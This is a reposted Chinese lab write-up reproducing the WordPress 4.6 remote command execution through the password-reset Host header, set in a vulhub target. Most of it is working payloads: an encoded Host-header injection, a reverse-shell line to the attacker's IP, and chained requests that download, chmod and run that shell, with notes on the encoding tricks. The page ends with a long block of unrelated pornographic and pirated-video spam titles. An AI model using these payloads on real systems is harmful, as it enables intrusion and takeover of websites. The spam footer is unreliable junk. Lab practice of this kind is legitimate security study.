WordPress4.6任意命令執行漏洞

前言

WordPress 是一種使用 PHP 語言開發的博客平臺,用戶可以在支持 PHP 和 MySQL 數據庫的服務器上架設屬于自己的網站。愛掏網 - it200.com也算是一個內容管理系統(CMS)

環境搭建

docker環境 (搭建可參考:https://www.cnblogs.com/BlogVice-2203/p/16977227.html)靶場在vulhub即可下載靶機centos7:192.168.31.230攻擊機kali: 192.168.31.153

導入后開啟靶場docker-compose builddocker-compose up -d

訪問http://your-ip:8080/ ,安裝cms系統

漏洞復現

漏洞點在忘記密碼處,需要一個已知的用戶可以發送數據

數據包中的Host字段的值修改為以下值,發送數據包,在/tmp下新建一個success文件Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

緊接著在kali的/var/www/html下新建一個1.txt,寫入bash -i >& /dev/tcp/192.168.31.153/5566 0>&1service apache2 start

發送shell數據包,將1.txt中的內容發送到靶機且新建一個shell文件存儲/usr/bin/wget --output-document /tmp/shell 192.168.31.153/1.txt${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}192.168.31.153${substr{0}{1}{$spool_directory}}1.txt

發送數據包修改shell權限為777任意執行權限${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}chmod${substr{10}{1}{$tod_log}}777${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

發送數據包執行shell,kali監聽5566端口${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell

漏洞復現總結

1.該漏洞在數據包的host字段,執行的命令不能有: 、’符號2.命令需要絕對路徑3.空格被\({substr{10}{1}{\)tod_log}}代替 /被\({substr{0}{1}{\)spool_directory}}代替4.字段值需要全小寫,且需要一個已知的用戶

利用這個漏洞,發送反彈shell的文件,修改文件權限777,再用kali監聽獲取后臺

本文來自博客園,作者:Vice_2203,轉載請注明原文鏈接:https://www.cnblogs.com/BlogVice-2203/p/17083257.html

聲明:所有內容來自互聯網搜索結果,不保證100%準確性,僅供參考。如若本站內容侵犯了原著者的合法權益,可聯系我們進行處理。
發表評論
更多 網友評論0 條評論)
暫無評論

返回頂部

主站蜘蛛池模板: 大ji巴想cao死你高h男男 | 日本三级香港三级人妇99视| 国产亚洲午夜精品| 中国一级特黄高清免费的大片中国一级黄色片 | 国产精品久久久久影院免费 | yy6080理aa级伦大片一级毛片| 国产五月天在线| 成人观看网站a| 色天使色婷婷丁香久久综合| 拍拍拍无档又黄又爽视频| 免费无码又爽又刺激毛片| 91在线看片一区国产| 最好免费观看韩国+日本| 国产一有一级毛片视频| free性中国熟女hd| 欧美日本视频在线观看| 国产成人无码网站| 中文字幕人妻偷伦在线视频| 热re99久久精品国产66热| 国产真实伦在线观看| 中文字幕无码精品三级在线电影| 男女一边摸一边做爽爽| 国产精品东北一极毛片| 久久99精品国产麻豆不卡| 狠狠综合亚洲综合亚洲色| 国产欧美日韩在线观看精品| 中文字幕永久更新| 法国性经典xxxxhd| 国产又色又爽又刺激在线观看| 一个人的突击队3电影在线观看| 欧美日韩一区二区在线| 国产乱妇无码大片在线观看 | 国产玉足榨精视频在线观看| 成人深夜福利视频| 亚洲欧美一区二区三区孕妇| 超级乱淫岳最新章节目录| 女人与禽交视频免费看| 亚洲av午夜成人片| 精品一区二区三区视频| 国产激情对白一区二区三区四| 与子乱刺激对白在线播放|